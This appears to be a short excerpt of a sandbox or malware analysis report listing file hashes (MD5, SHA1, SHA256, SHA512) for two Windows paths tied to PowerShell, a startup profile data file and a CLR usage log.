SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c8861299853606fac3016094fcb76d2e
SHA1 8969dfdc86ceceb91bec0956f6a672a8606bc841
SHA256 07b966f55b6c7b2f633c7a4ace5c3cc0fc6f6dcbea8ff0da2210ed4a34c2cdf0
SHA512 841ca021eb2e9cb9831c2637f97739b0f2b35919b4e7eea3e39af808564f06b1d2175d618912603d1f61b364882c626799f68e069b13224d5db920ac7a267ef3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00